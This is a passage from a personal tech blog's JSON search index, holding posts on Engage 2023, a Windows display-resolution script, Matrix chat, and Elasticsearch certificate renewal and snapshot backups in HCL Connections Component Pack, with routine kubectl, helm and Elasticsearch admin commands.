Connections Juniper:\nCopyright © 2023CL Software Limited | Confidential I had the opportunity to do a new version of the Connections Admintoolbox session.\nHCL Connections Admin Toolbox 2023 Best viewed in fullscreen (use F11 in any browser) Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/engage2023-admintoolbox.html) The closing session was even more emotional than the years before and the biggest announcement:\nEngage 2024 will be in Antwerp.\n","excerpt":"\u003cp\u003eThis year, \u003ca href=\"https://engage.ug\" target=\"_blank\"\u003eEngage \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n took place at the \u003ca href=\"https://felixmeritis.nl/\" target=\"_blank\"\u003eFelix Meritis \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in \u003ca href=\"https://www.iamsterdam.com/\" target=\"_blank\"\u003eAmsterdam \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nThe \u003ca href=\"https://engage.ug/Engage2.nsf/Pages/about\" target=\"_blank\"\u003eEngage board (Hilde, Theo and Kris) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n did a great job and made this very special conference a great success.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/engage2023/","title":"Engage 2023"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/engageug/","title":"Engageug"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/engageug/","title":"Engageug"},{"body":"You can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\nEngage \u0026ndash; https://engage.ug HCL Connections Admin Toolbox Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/engage2023-admintoolbox.html) DACHNUG 50 - https://dnug.de Fehleranalyse bei HCL Connections FroSCon 2023 - https://froscon.org Dotfiles verwalten Was man besser nicht mit einer Tabellenkalkulation macht ","excerpt":"\u003cp\u003eYou can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\u003c/p\u003e\n\u003ch2 id=\"engage----httpsengageug\"\u003eEngage \u0026ndash; \u003ca href=\"https://engage.ug\" target=\"_blank\"\u003ehttps://engage.ug \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#engage----httpsengageug\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/engage2023-admintoolbox.html\" target=\"_blank\"\u003eHCL Connections Admin Toolbox \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ciframe width=\"1024\" height=\"576\" marginheight=\"0\" marginwidth=\"0\" src=\"https://share.stoeps.de/engage2023-admintoolbox.html\"\u003e\n Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/engage2023-admintoolbox.html)\n\u003c/iframe\u003e\n\u003ch2 id=\"dachnug-50---httpsdnugde\"\u003eDACHNUG 50 - \u003ca href=\"https://dnug.de\" target=\"_blank\"\u003ehttps://dnug.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#dachnug-50---httpsdnugde\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2023-DACHNUG50_Troubleshooting_HCL_Connections.pdf\" target=\"_blank\"\u003eFehleranalyse bei HCL Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"froscon-2023---httpsfrosconorg\"\u003eFroSCon 2023 - \u003ca href=\"https://froscon.org\" target=\"_blank\"\u003ehttps://froscon.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#froscon-2023---httpsfrosconorg\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003eDotfiles verwalten\u003c/li\u003e\n\u003c/ul\u003e\n\u003ciframe width=\"1024\" height=\"576\" src=\"https://media.ccc.de/v/froscon2023-2907-dotfiles_verwalten/oembed\" frameborder=\"0\" allowfullscreen\u003e\u003c/iframe\u003e\n\u003cul\u003e\n\u003cli\u003eWas man besser nicht mit einer Tabellenkalkulation macht\u003c/li\u003e\n\u003c/ul\u003e\n\u003ciframe width=\"1024\" height=\"576\" src=\"https://media.ccc.de/v/froscon2023-2949-was_man_besser_nicht_mit_einer_tabellenkalkulation_macht/oembed\" frameborder=\"0\" allowfullscreen\u003e\u003c/iframe\u003e","ref":"https://stoeps.de/speaking/2023/","title":"Talks 2023"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/display/","title":"Display"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/resolution/","title":"Resolution"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tiu/","title":"Tiu"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tools/","title":"Tools"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/windows/","title":"Windows"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/windows/","title":"Windows"},{"body":"I spend the entire day working on a very sizable 4k UHD display, and I frequently ran into the problem of wanting to share my screen with participants in various collaboration tools. Then, viewers claim that my screen is too small on the remote displays due to the display resolution of 3840x2160 pixels.\nIn order to adjust the resolution, I often go to the desktop and right-click. It is quite frustrating to have to do that several times each day (and switch back after the meeting).\nI created some scripts for Linux that may automatically execute when I start with or without an external display and modify the display resolution. Unfortunately, I also need to utilize other operating systems. What choices are available on Windows?\nI discovered three PowerShell scripts and EXE files, however two of them required licenses for non-personal usage and one of them was broken. I landed up at http://tools.taubenkorb.at/change-screen-resolution/#download , which is available for free download the author just asks for a donation.\nI made two cmd files and transferred the script to my desktop:\n4k.cmd\nChangeScreenResolution.exe /w=3840 /h=2160 /d=0 full_hd.cmd\nChangeScreenResolution.exe /w=1920 /h=1080 /d=0 Now, all I have to do to change the display resolution is double-click the script.\nIt only takes some seconds each time, but the experience is fantastic.\n","excerpt":"\u003cp\u003eI spend the entire day working on a very sizable 4k UHD display, and I\nfrequently ran into the problem of wanting to share my screen with\nparticipants in various collaboration tools.\nThen, viewers claim that my screen is too small on the remote displays due\nto the display resolution of 3840x2160 pixels.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/windows-change-display-resolution-script/","title":"Windows change display resolution with one click"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/chat/","title":"Chat"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/chat/","title":"Chat"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/matrix/","title":"Matrix"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/matrix/","title":"Matrix"},{"body":"The last months I played around with Matrix , a secure and open collaboration system. The protocol looks very promising, it allows hosting your own server and federate it to other systems. So like SMTP, all these matrix users can communicate to each other.\nThis is Matrix. Matrix is an open source project that publishes the Matrix open standard for secure, decentralised, real-time communication, and its Apache licensed reference implementations.\nMaintained by the non-profit Matrix.org Foundation, we aim to create an open platform which is as independent, vibrant and evolving as the Web itself\u0026hellip; but for communication.\nAs of June 2019, Matrix is out of beta, and the protocol is fully suitable for production usage. https://matrix.org/ Matrix Homepage I registered a user at matrix.org , and you can reach me at @stoeps:matrix.org.\nWhy did I start using Matrix?\nMy first group which I joined and reason for registering a Matrix account was the Tilpod matrix chat Fosdem 2022 hosted the online conference with Matrix and Jitsi and handled up to 23000 users All messages are encrypted, the clients and protocol is Open Source Bridges are available to integrate other collaboration protocols like Discord, Whatsapp, Skype and Slack (any many more) Clients for most OS are available to use Matrix for Android, iOS, Web browser, Desktop and so on. So I hope that whenever I want to change to another collaboration system, I don\u0026rsquo;t loose messages again.\nLike the Tilpod group, I created a new group to discuss things around HCL Connections, the group is public, and you\u0026rsquo;re open to join at any time.\nRoom link connections-on-premises When you follow the link, it provides you with all steps to join with your own Matrix instance, or with the web client.\nExample for joining a group If anybody wants to test the bridge to Discord, I\u0026rsquo;m happy to help set up something like https://t2bot.io/discord/ .\n","excerpt":"\u003cp\u003eThe last months I played around with \u003ca href=\"https://matrix.org\" target=\"_blank\"\u003eMatrix \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, a secure and open collaboration system. The protocol looks very promising, it allows hosting your own server and federate it to other systems. So like SMTP, all these matrix users can communicate to each other.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/matrix_channel/","title":"Matrix Channel"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/opensource/","title":"Opensource"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/certificate/","title":"Certificate"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/componentpack/","title":"Componentpack"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/connections/","title":"Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/documentation/","title":"Documentation"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/elasticsearch/","title":"Elasticsearch"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/elasticsearch/","title":"Elasticsearch"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/security/","title":"Security"},{"body":"Elasticsearch in HCL Connections Componentpack is secured with Searchguard and needs certificates to work properly. These certificates are generated by bootstrap during the initial container deployment with helm.\nThese certificates are valid for 10 years (chain_ca.pem) or 2 years (elasticsearch*.pem) and stored in the Kubernetes secrets elasticsearch-secret, elasticsearch-7-secret. So when your HCL Connections deployment is running for 2 years, the certficates stop working.\nThe documentation on bootstrap is a little bit misleading and my suggested update does not make it into a technote or documentation update since nearly one year.\nSet up bootstrap charts Bootstrap is one-time job. It creates secrets and certificates for various components, including Redis, MongoDB and ElasticSearch.\nBe aware that simply rerunning/upgrading bootstrap also means recreating all those secrets and certificates, and requires in some cases redoing the steps which were dependent on it (like setting up certificates again for Metrics).\nStarting with Component Pack 7, bootstrap will also create secrets and certificates for ElasticSearch 7.\nhttps://help.hcltechsw.com/connections/v7/admin/install/cp_install_services_tasks.html?hl=bootstrap#cp_install_services_tasks__section_iqb_24c_qmb HCL Connections documentation For Elasticsearch this is wrong. Bootstrap does only generate new certificates, if the variable env.force_regenerate is set to true. The default is false, so we have to set it during the helm command.\nUpdate Elasticsearch certificates (Example commands for Elasticsearch 7) If you are still using Elasticsearch 5, then just remove -7 from the commands below.\nGet certificate from Kubernetes secret kubectl get secret elasticsearch-7-secret -n connections \\ -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-admin\\.crt\\.pem\u0026#39;]}\u0026#34; | base64 -d \u0026gt; elasticsearch-admin.crt.pem Check dates for certificate openssl x509 -startdate -enddate -noout -in elasticsearch-admin.crt.pem notBefore=Aug 16 08:10:54 2022 GMT notAfter=Aug 15 08:10:54 2024 GMT Delete bootstrap helm delete bootstrap -n connections Reinstall with helm If we use the command from documentation, the certificate extracted from Kubernetes has still the same enddate.\nhelm install bootstrap \\ /opt/hcl-cnx-component-pack/microservices_connections/hybridcloud/helmbuilds/bootstrap-0.1.0-20210418-223218.tgz \\ -f /home/ansible/generated_charts/bootstrap.yml -n connections We need to run\nhelm install bootstrap \\ /opt/hcl-cnx-component-pack/microservices_connections/hybridcloud/helmbuilds/bootstrap-0.1.0-20210418-223218.tgz \\ -f /home/ansible/generated_charts/bootstrap.yml -n connections --set env.force_regenerate=true Check if the bootstrap pod is completed, then check the certificate again:\nkubectl get pods -n connections | grep bootstrap bootstrap-p4rj6 0/1 Completed 0 49m kubectl get secret elasticsearch-7-secret -n connections \\ -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-admin\\.crt\\.pem\u0026#39;]}\u0026#34; | base64 -d \u0026gt; elasticsearch-admin_neu.crt.pem openssl x509 -startdate -enddate -noout -in elasticsearch-admin_neu.crt.pem notBefore=Sep 2 10:01:56 2022 GMT notAfter=Sep 1 10:01:56 2024 GMT Restart Elasticsearch kubectl rollout restart sts es-master-7 es-data-7 -n connections kubectl rollout restart deploy es-client-7 -n connections Recreate elasticsearch-metrics.p12 kubectl get secret elasticsearch-7-secret -n connections \\ -o=jsonpath=\u0026#34;{.data[\u0026#39;chain-ca\\.pem\u0026#39;]}\u0026#34; | base64 -d \u0026gt; chain-ca.pem kubectl get secret elasticsearch-7-secret -n connections \\ -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-metrics\\.p12\u0026#39;]}\u0026#34; | base64 -d \u0026gt; elasticsearch-metrics.p12 Copy these certificates to the WebSphere Deployment Manager, check the path of the old certificate store and use the same. cd /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -user wasadmin_user -password wasadmin_password execfile(\u0026#39;esSecurityAdmin.py\u0026#39;) enableSslForMetrics(\u0026#39;/opt/IBM/certs/es_certs/elasticsearch-metrics.p12\u0026#39;, \u0026#39;Elasticsearch_CA_password\u0026#39;, \u0026#39;/opt/IBM/certs/es_certs/chain-ca.pem\u0026#39;, \u0026#39;30098\u0026#39;) Copy the updated elasticsearch-metrics.p12 file from the Deployment Manager to the same location on the WebSphere Application Server nodes. Then restart your WebSphere environment (with Deployment Manager and Node Agents).\n","excerpt":"\u003cp\u003eElasticsearch in HCL Connections Componentpack is secured with Searchguard and needs certificates to work properly. These certificates are generated by \u003ca href=\"https://help.hcltechsw.com/connections/v7/admin/install/cp_install_services_tasks.html?hl=bootstrap#cp_install_services_tasks__section_iqb_24c_qmb\" target=\"_blank\"\u003ebootstrap \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n during the initial container deployment with \u003ccode\u003ehelm\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eThese certificates are valid for 10 years (\u003ccode\u003echain_ca.pem\u003c/code\u003e) or 2 years (\u003ccode\u003eelasticsearch*.pem\u003c/code\u003e) and stored in the Kubernetes secrets \u003ccode\u003eelasticsearch-secret\u003c/code\u003e, \u003ccode\u003eelasticsearch-7-secret\u003c/code\u003e. So when your HCL Connections deployment is running for 2 years, the certficates stop working.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/update-elasticsearch-certificates/","title":"Update Elasticsearch certificates in Componentpack"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/backup/","title":"Backup"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/backup/","title":"Backup"},{"body":"Last week I played around with the HCL Connections documentation to backup Elasticsearch in the article Backup Elasticsearch Indices in Component Pack .\nIn the end I found that I couldn\u0026rsquo;t get the snapshot restored and that I have to run a command outside of my Kubernetes cluster to get a snapshot on a daily basis. That\u0026rsquo;s not what I want.\nSo the first idea was to move the job defined in the helm chart into a Kubernetes cronjob. So I changed the definition to a cronjob. So now I have a job running from Kubernetes.\nI added a new default variable:\ncronTimes: \u0026#34;0 6,18 * * *\u0026#34; So without changing this, when we deploy the cronjob, at 6:00 and 18:00 (or 6am and 6pm) the cronjob runs and creates a snapshot.\nSo what happens if we want to restore a snapshot? When we add the restore script to the same helm chart as our backup script, we have to delete the installation and loose all logs of our backup jobs. The snapshots are still there, but the history is gone.\nSo I created seperate helm charts, first the cronjob to create snapshots and second the job to restore the snapshot. The restore script restores all indices in our snapshot, this fails because some of them are system indices and always open. So the restore fails all the time in my tests.\nThe biggest caveat with the restore script is that it closes all indices. Each index would automatically open again after a successful restore, but the restore fails and so all indices stay closed.\nI tried adding command options to the delivered restore command to only restore the icmetrics*, orient-me-collection and quickresults indices, but the restore script was too limited for me.\nIf you want to use this helm chart, feel free to download:\nesbackup-0.1.0.tgz I\u0026rsquo;m not responsible for your data or give support on these scripts! Use it on your own risk!\nI\u0026rsquo;m not happy with the restore script, so no download for the moment.\nUse Kibana and create a snapshot policy In former Componentpack versions, there was a helm chart to deploy Elasticstack (Kibana, Logstash and Filebeat). This chart is still contained in the Componentpack package, but the image are missing.\nI asked for updated images in a case and got them from HCL support. As far as I know, these helm chart and images are not available on Flexnet until now, but I\u0026rsquo;m confident, that support will send them to you on request.\nIn Kibana we can define policies for automatic snapshots , these can be configured through the web UI and show the http request which is sent to Elasticsearch. So we can configure these snapshots without installing Kibana for now.\nTo create a snapshot in the evening each day:\nOpen a shell in one of the es-client pods: kubectl exec -it -c es-client $(kubectl get pods -l component=elasticsearch7,role=client | awk \u0026#39;/client/{print $1}\u0026#39; | head -n 1 ) -- bash The backup store is mounted into all Elasticsearch pods, so no need to change anything on the deployments or statefulsets. cd /opt/elasticsearch-7.10.1/probe ./sendRequest.sh PUT /_slm/policy/daily-snapshot -H \u0026#39;Content-Type: application/json\u0026#39; -d \u0026#39; { \u0026#34;name\u0026#34;: \u0026#34;\u0026lt;daily-snap-{now/d}\u0026gt;\u0026#34;, \u0026#34;schedule\u0026#34;: \u0026#34;0 31 16 * * ?\u0026#34;, \u0026#34;repository\u0026#34;: \u0026#34;connectionsmetrics\u0026#34;, \u0026#34;config\u0026#34;: { \u0026#34;indices\u0026#34;: [ \u0026#34;ic*\u0026#34;, \u0026#34;quickresults\u0026#34;, \u0026#34;orient-me-collection\u0026#34; ], \u0026#34;ignore_unavailable\u0026#34;: true }, \u0026#34;retention\u0026#34;: { \u0026#34;expire_after\u0026#34;: \u0026#34;3d\u0026#34;, \u0026#34;min_count\u0026#34;: 3, \u0026#34;max_count\u0026#34;: 5 } } \u0026#39; This will create a scheduled snapshot of the configured indices (ic*, quickresults and orient-me-collection), at 16:31 UTC (the leading zero are the seconds). And keep 3 snapshots as a minimum. So retention and automatically delete snapshots after the configured time.\nElasticsearch cron expressions Elasticsearch snapshots are automatically deduplicated!\nSnapshots are automatically deduplicated to save storage space and reduce network transfer costs. To back up an index, a snapshot makes a copy of the index’s segments and stores them in the snapshot repository. Since segments are immutable, the snapshot only needs to copy any new segments created since the repository’s last snapshot.\nEach snapshot is also logically independent. When you delete a snapshot, Elasticsearch only deletes the segments used exclusively by that snapshot. Elasticsearch doesn’t delete segments used by other snapshots in the repository.\nElasticsearch: Snapshot and restore So no waste of diskspace if you add more snapshots. I play around with hourly snapshots at the moment:\ncd /opt/elasticsearch-7.10.1/probe ./sendRequest.sh PUT /_slm/policy/hourly-snapshot -H \u0026#39;Content-Type: application/json\u0026#39; -d \u0026#39; { \u0026#34;name\u0026#34;: \u0026#34;\u0026lt;hourly-snap-{now/d}\u0026gt;\u0026#34;, \u0026#34;schedule\u0026#34;: \u0026#34;0 0 * * * ?\u0026#34;, \u0026#34;repository\u0026#34;: \u0026#34;connectionsmetrics\u0026#34;, \u0026#34;config\u0026#34;: { \u0026#34;indices\u0026#34;: [ \u0026#34;ic*\u0026#34;, \u0026#34;quickresults\u0026#34;, \u0026#34;orient-me-collection\u0026#34; ], \u0026#34;ignore_unavailable\u0026#34;: true }, \u0026#34;retention\u0026#34;: { \u0026#34;expire_after\u0026#34;: \u0026#34;1d\u0026#34;, \u0026#34;min_count\u0026#34;: 6, \u0026#34;max_count\u0026#34;: 12 } } \u0026#39; This can be set with Kibana, but no need to deploy it, if you don\u0026rsquo;t need it. You can use the curl calls above to configure the snapshots.\n","excerpt":"\u003cp\u003eLast week I played around with the \u003ca href=\"https://help.hcltechsw.com/connections/v7/admin/admin/cp_config_es_backup_restore_data.html\" target=\"_blank\"\u003eHCL Connections documentation to backup Elasticsearch \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in the article \u003ca href=\"/posts/2022/backup-elasticsearch-indices\"\u003eBackup Elasticsearch Indices in Component Pack\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eIn the end I found that I couldn\u0026rsquo;t get the snapshot restored and that I have to run a command outside of my Kubernetes cluster to get a snapshot on a daily basis. That\u0026rsquo;s not what I want.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/backup-elasticsearch-indices-cronjob/","title":"How to get regular snapshots with Elasticsearch"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/metrics/","title":"Metrics"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/snapshot/","title":"Snapshot"},{"body":"During a migration from Cognos Metrics to Elasticsearch Metrics, I had some issues with the index. So I wanted to create a backup of the already migrated data and start over from scratch.\nThe official documentation has an article on the topic: Backing up and restoring data for Elasticsearch-based components , but I had to slightly adjust the commands to get a successful snapshot.\nThe documentation shows commands only for Elasticsearch 5, with Connections 7 you have the option to switch to Elasticsearch 7, then all pod names get an additional -7 in the name!\nDuring the deeper analysis of the backup and restore scripts, I found that I have to change the helm chart, so I will show the process for Elasticsearch 5 \u0026amp; 7.\nRequirement helm 3 and connections as default namespace!\nSet default namespace for kubectl I don\u0026rsquo;t want to type -n connections over and over again with each kubectl command, so I set connections as a default:\nkubectl config set-context --current --namespace=connections Register snapshot repository Run this on your Kubernetes master or a machine configured for accessing the Kubernetes cluster with kubectl.\nOpen a shell in one o the es-client pods (works for ES 5 and 7):\nkubectl exec -ti -n connections $(kubectl get pods -n connections |grep es-client |awk \u0026#39;{print $1}\u0026#39; |head -n 1) -- bash The documentation tells us, that the default for the snapshot name is connectionsbackup, but the doBackup.sh script in /opt/elasticsearch-5.5.1/probe (in version 6.0) uses connectionsmetrics to create a snapshot, newer versions define the default repository in the helm chart values.yaml and it is still connectionsmetrics. Using the documented default will end in an error.\nRun the following commands in the container shell:\ncd /opt/elasticsearch-${ES_VERSION}/probe/ ./sendRequest.sh PUT /_snapshot/connectionsmetrics \\ -H \u0026#39;Content-Type: application/json\u0026#39; \\ -d \u0026#39;{\u0026#34;type\u0026#34;: \u0026#34;fs\u0026#34;,\u0026#34;settings\u0026#34;: {\u0026#34;compress\u0026#34;: true,\u0026#34;location\u0026#34;: \u0026#34;/backup\u0026#34;}}\u0026#39; Response from server:\n{ \u0026#34;acknowledged\u0026#34;: true } Check the settings of the backup repository:\n./sendRequest.sh GET /_snapshot/_all?pretty Response from server:\n{ \u0026#34;connectionsmetrics\u0026#34;: { \u0026#34;type\u0026#34;: \u0026#34;fs\u0026#34;, \u0026#34;settings\u0026#34;: { \u0026#34;compress\u0026#34;: \u0026#34;true\u0026#34;, \u0026#34;location\u0026#34;: \u0026#34;/backup\u0026#34; } } } You can keep the container shell open, we will need it a little bit later again.\nGet image tag and registry Run this on your Kubernetes master or a machine configured for accessing the Kubernetes cluster with kubectl.\nWe have to use different commands for version 5 and 7, so I ran a short script to find out the deployed version, or just use es-data for version 5 and es-data-7 for version 7.\nif [ $(kubectl get pods | grep es-data | head -n 1 | awk -F\u0026#39;-\u0026#39; \u0026#39;$3 == \u0026#34;7\u0026#34; {print $3}\u0026#39;) -eq \u0026#34;7\u0026#34; ] then version=-7 elasticVersion=7 else version= elasticVersion=5 fi You should see something similar to the following output:\nestag=$(kubectl get statefulset es-data${version} -o=jsonpath=\u0026#39;{$.spec.template.spec.containers[:1].image}\u0026#39; | awk -F: \u0026#39;{print $3}\u0026#39;) registry=$(kubectl get statefulset es-data${version} -o=jsonpath=\u0026#39;{$.spec.template.spec.containers[:1].image}\u0026#39; | awk -F/ \u0026#39;{print $1}\u0026#39;) echo $estag 20180503-104412 echo $registry cnx7-rh8-cp.stoeps.home:5000 helm chart for backup and restore I tried to use the helm chart delivered with Componentpack, but in the template files the path for version 5.5 is hard coded, the namespace is missing for the used image and I wanted to use the chart for version 7 and 5 of Elasticsearch.\nSo I rewrote the provided files, added the missing variables and if-else conditions. You can download the adjusted chart , I changed the name to esbackuprestore-0.1.1.tgz, so you can keep it in the same folder as the orginal file (esbackuprestore-0.1.0.tgz).\nCreate snapshot Delete esbackuprestore helm deployment If you already have used the helm chart, you need to delete esbackuprestore to run the install commands again.\nCheck if the chart is already installed:\nhelm list | grep esbackuprestore If it is already deployed, the command returns:\nesbackuprestore connections\t1 2022-07-29 20:17:06.456765299 +0000 UTC\tfailed esbackuprestore-0.1.1 Then delete it:\nhelm delete esbackuprestore -n connections No matter if you get an error here, I assume you never created an Elasticsearch backup within Componentpack.\nCreate snapshot cd extractedFolder/microservices_connections/hybridcloud/helmbuilds/ helm install esbackuprestore esbackuprestore-0.1.1.tgz \\ --set image.tag=$estag,elasticSearchBackup=true,image.repository=$registry,elasticVersion=$elasticVersion To make more snapshots just run the command to delete and install again.\nI get an error message, that the job is already deployed, but the snapshot is created. I will check the root cause, but actually the job runs and creates snapshots.\nRestore snapshot First we need to find out the snapshot name. To make this a little bit easier, download and install jq or gron . I prefer gron, the syntax is easier and you can grep within the results.\nGet snapshot name with gron # Version 5 kubectl exec -ti -n connections -c es-client \\ $(kubectl get pods -n connections | grep es-client | awk \u0026#39;{print $1}\u0026#39; | head -n 1) \\ -- /opt/elasticsearch-5.5.1/probe//sendRequest.sh GET /_snapshot/connectionsmetrics/_all \\ | grep snapshots | gron | grep \u0026#34;snapshot =\u0026#34; # Version 7 kubectl exec -ti -n connections -c es-client \\ $(kubectl get pods -n connections |grep es-client |awk \u0026#39;{print $1}\u0026#39; |head -n 1) \\ -- /opt/elasticsearch-7.10.1/probe//sendRequest.sh GET /_snapshot/connectionsmetrics/_all \\ | grep snapshots | gron | grep \u0026#34;snapshot =\u0026#34; Result:\njson.snapshots[0].snapshot = \u0026#34;snapshot20220729182836\u0026#34;; json.snapshots[1].snapshot = \u0026#34;snapshot20220729183056\u0026#34;; json.snapshots[2].snapshot = \u0026#34;snapshot20220729183246\u0026#34;; Get snapshot name with jq # Version 5 kubectl exec -ti -n connections -c es-client \\ $(kubectl get pods -n connections |grep es-client |awk \u0026#39;{print $1}\u0026#39; |head -n 1) \\ -- /opt/elasticsearch-5.5.1/probe/sendRequest.sh GET /_snapshot/connectionsmetrics/_all \\ | grep snapshots | jq \u0026#39;.snapshots[] | .snapshot\u0026#39; # Version 7 kubectl exec -ti -n connections -c es-client \\ $(kubectl get pods -n connections |grep es-client |awk \u0026#39;{print $1}\u0026#39; |head -n 1) \\ -- /opt/elasticsearch-7.10.1/probe/sendRequest.sh GET /_snapshot/connectionsmetrics/_all \\ | grep snapshots | jq \u0026#39;.snapshots[] | .snapshot\u0026#39; Result:\n\u0026#34;snapshot20220729182836\u0026#34; \u0026#34;snapshot20220729183056\u0026#34; \u0026#34;snapshot20220729183246\u0026#34; Restore command Adding | tail -n 1 to the get name commands, shows the last created snapshot, copy the name and use with helm. Before running the helm command to need again delete the esbackuprestore application.\nWith the restore command we need REPONAME (Default: connectionsmetrics) and SNAPSHOTNAME.\nhelm delete esbackuprestore helm install esbackuprestore esbackuprestore-0.1.1.tgz \\ --set image.tag=$estag,elasticSearchRestore=true,image.repository=$registry,namespace=connections,/ SNAPSHOTNAME=snapshot20220729183246,REPONAME=connectionsmetrics Delete snapshots The documentation does not tell us how to delete snapshots, I have no experience how large they get, so if you ever have to remove older snapshots, open a shell in one of the es-data pods and run the command:\n/opt/elasticsearch-${ES_VERSION}/probe/sendRequest.sh DELETE /_snapshot/connectionsmetrics/snapshotname-to-delete Do not use restore at the moment!!! I tested the restore and it fails, because one of the indices is open and can\u0026rsquo;t be restored.\nProblem here is, that the doRestore.sh closes all indices, when it is started, but only opens them when the restore is successful.\nSo the whole process with these charts (mine, or the original one from HCL) can\u0026rsquo;t be recommended at the moment.\nI think the backup is important, because Snapshot and restore tells us:\nTaking a snapshot is the only reliable and supported way to back up a cluster. You cannot back up an Elasticsearch cluster by making copies of the data directories of its nodes. There are no supported methods to restore any data from a filesystem-level backup.\nElasticsearch is used to store Metrics and typeahead data, no content, but still valid data for us and our users.\nNow we need to find a way to get a reliable way to restore these snapshots, if this is done, I will work on a way to backup mongoDB. The mongoDB is used with Activities Plus and afaik with Orient Me, but documentation does not show a way to backup.\n","excerpt":"\u003cp\u003eDuring a migration from Cognos Metrics to Elasticsearch Metrics, I had some issues with the index. So I wanted to create a backup of the already migrated data and start over from scratch.\u003c/p\u003e\n\u003cp\u003eThe official documentation has an article on the topic: \u003ca href=\"https://help.hcltechsw.com/connections/v7/admin/admin/cp_config_es_backup_restore_data.html\" target=\"_blank\"\u003eBacking up and restoring data for Elasticsearch-based components \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, but I had to slightly adjust the commands to get a successful snapshot.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/backup-elasticsearch-indices/","title":"Backup Elasticsearch Indices in Component Pack"},{"body":"In the last few years, I have had issues with application servers using a large amount of CPU and even hanging application servers running the Tiny Spellchecking service. It ended with disabled spellchecking in the Tiny Editors\u0026rsquo; config.js.\nSharedDirectory/customization/javascript/tiny/editors/connections/config.js\n... // Set to false to disable Tiny\u0026#39;s spell checking service in TinyMCE and Textbox.io. spellingServiceEnabled: false, ... I worked with HCL and Tiny Support on these issues, and they provided updates during the last year. This should have been fixed since TinyMCE 5.9.\nNow, after updating to the actual editor version, TinyMCE 5.10.2, we decided to re-enable the spellchecker, and for the first few days 